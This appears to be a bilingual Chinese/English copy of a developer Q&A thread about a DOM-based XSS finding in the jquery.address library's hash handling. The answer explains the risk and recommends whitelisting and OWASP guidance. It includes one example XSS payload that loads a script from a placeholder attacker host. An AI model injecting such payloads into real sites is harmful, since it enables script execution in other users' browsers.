安全扫描在JS脚本文件中显示漏洞
[英]Security Scan shows vulnerability in JS Script file
问题描述
I recently ran a Security Scan on my site, and one of the JS files being used, was flagged as having DOM Cross Site Scripting Issue, and I'm not sure how I can fix it. 
我最近在我的网站上进行了一次安全扫描,正在使用的一个JS文件被标记为具有DOM跨站点脚本问题,并且我不确定如何解决它。
File: jquery.address1.4.js 档案:jquery.address1.4.js
Here is script from the portion of the code that was flagged: 这是被标记的代码部分中的脚本:
_supported =
(_mozilla && _version >= 1) ||
(_msie && _version >= 6) ||
(_opera && _version >= 9.5) ||
(_webkit && _version >= 523);
if (_supported) {
if (_opera) {
history.navigationMode = 'compatible';
}
if (document.readyState == 'complete') {
var interval = setInterval(function() {
if ($.address) {
_load();
clearInterval(interval);
}
}, 50);
} else {
_options();
$(_load);
}
$(window).bind('popstate', _popstate).bind('unload', _unload);
} else if (!_supported && _hrefHash() !== '') {
_l.replace(_l.href.substr(0, _l.href.indexOf('#')));
} else {
_track();
}
The line of code that is this: 这行代码是这样的:
_l.replace(_l.href.substr(0, _l.href.indexOf('#')));
The scan is telling me to sanitize the inputs, but I'm not sure what it's referring to since we have no "inputs" on the site. 扫描告诉我要清理输入,但是由于站点上没有“输入”,所以我不确定它指的是什么。 How can fix the above code so it can pass a security scan? 如何解决上述代码,使其可以通过安全扫描?
EDIT: This is the the value of _l 编辑:这是_l的值
_l = _t.location,
From: 从:
_window = function() {
try {
return top.document !== UNDEFINED ? top : window;
} catch (e) {
return window;
}
},
ID = 'jQueryAddress',
STRING = 'string',
HASH_CHANGE = 'hashchange',
INIT = 'init',
CHANGE = 'change',
INTERNAL_CHANGE = 'internalChange',
EXTERNAL_CHANGE = 'externalChange',
TRUE = true,
FALSE = false,
_opts = {
autoUpdate: TRUE,
crawlable: FALSE,
history: TRUE,
strict: TRUE,
wrap: FALSE
},
_browser = $.browser,
_version = parseFloat($.browser.version),
_mozilla = _browser.mozilla,
_msie = _browser.msie,
_opera = _browser.opera,
_webkit = _browser.webkit || _browser.safari,
_supported = FALSE,
_t = _window(),
_d = _t.document,
_h = _t.history,
_l = _t.location,
_si = setInterval,
_st = setTimeout,
_re = /\/{2,9}/g,
_agent = navigator.userAgent,
_frame,
_form,
_url = _search(document),
_qi = _url ? _url.indexOf('?') : -1,
_title = _d.title,
_silent = FALSE,
_loaded = FALSE,
_justset = TRUE,
_juststart = TRUE,
_updating = FALSE,
_listeners = {},
_value = _href();
1 个解决方案
解决方案1
0 2013-03-01 23:46:36
The unsanitized value in this example will be the hash value retrieved from your URL. 在此示例中,未经过滤的值将是从您的URL中检索的哈希值。 Any value the precede's the "#" in your URL, should be sanitized, to ensure that an attacker is not able to supply their own javascript in that context. 应该清除URL中以“#”开头的任何值,以确保攻击者无法在这种情况下提供自己的JavaScript。
Just because this value may not be an explicit user supplied "input", there is nothing to prevent a malicious user from supplying a malicious value such as the following: 仅仅因为此值可能不是由用户提供的显式“输入”,所以无法阻止恶意用户提供诸如以下内容的恶意值:
#"><script src=http://badguy.com/xss.js />
which would execute in the context of other users. 这将在其他用户的上下文中执行。
A valid defense for this example, or input sanitization, would be a whitelist approach. 此示例的有效辩护或输入清理将是白名单方法。 Only accept known values for #, do not allow anything that an attacker might supply. 仅接受#的已知值,不允许攻击者提供任何东西。
This is a great resource on defending against DOM based XSS https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet I suggest you read through it. 这是防御基于DOM的XSS的绝佳资源, https: //www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet,建议您仔细阅读。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.